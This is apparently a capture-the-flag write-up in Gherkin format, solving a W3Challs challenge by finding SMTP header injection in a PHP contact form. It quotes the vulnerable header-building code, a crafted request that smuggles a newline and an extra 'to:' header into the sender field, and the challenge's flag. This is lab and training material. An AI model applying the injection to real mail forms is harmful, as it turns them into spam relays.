## Version 2.0
## language: en

Feature: 30-Hacking-w3Challs
  Code:
    30
  Site:
    W3Challs
  Category:
    Hacking
  User:
    edr3mo
  Goal:
    Capture the flag through the email submission form

  Background:
  Hacker's software:
    | <Software name>             | <Version>   |
    | Kali Linux                  | 2019.1a     |
    | Firefox Quantum             | 60.6.2esr   |
    | BurpSuite Community Edition | 1.7.36      |
  Machine information:
    Given I am accessing the URL
    """
    http://mobile.hacking.w3challs.com/
    """
    And I see three posts one of them say
    """
    Because of numerous spam complaints, the site closes.
    It seems ‘hackers’ successfully hijacked the e-mail
    submission form...
    We have indeed received quite a lot of advertisement e-mails
    about Viagra, but we can't explain how it would be possible
    to send e-mails to other addresses...
    Goodbye.
    """
    Then I go to the Contact section
    And I see a contact section with three fields [evidence](form.png)
    Then I see at the end of the page a link to the source code
    And I open the link and see the mail source code

  Scenario: Success:mail-injection
    Given I read the post about the hijacked email submission form
    Then I review email submission form code
    """
    http://mobile.hacking.w3challs.com/mail_src.php
    """
    Then I read about modify HTTP responses
    Given I don't find any vulnerabilities to exploit with headers
    Then I search about PHP mail function vulnerabilities
    And I find that mail function has five parameters
    But only the two last parameters are vulnerable to users input
    Given this parameters are related to the mail headers
    Then I look for the headers in the code
    """
    $headers = 'From: '.$from."\r\n".
                           'Reply-To: '.$from."\r\n".
                           'X-Mailer: PHP/'.phpversion();
    """
    And I conclude that $from is the vulnerable parameter to be injected
    When I use the submission form I get the following headers
    """
    mail_from=w375675%40nwytg.net
    mail_subject=Hello
    mail_content=Hello
    """
    Then I see the request parameters are represented in hexadecimal
    And I search how to encoded for URL the line break
    Then I capture the request with BurpSuite and modify the parameters
    """
    mail_from=w375675%40nwytg.net%0Ato: mymail@mail.com&mail_subject=
    Hello&mail_content=Hello
    """
    Then I issue the request
    And in the Response get the following message
    """
    Congrats! You found and exploited an SMTP Injection!
    The password is 3v1l_Sp4m-1s_3v1l
    """
    Then I conclude I capture the flag [evidence](flag.png)
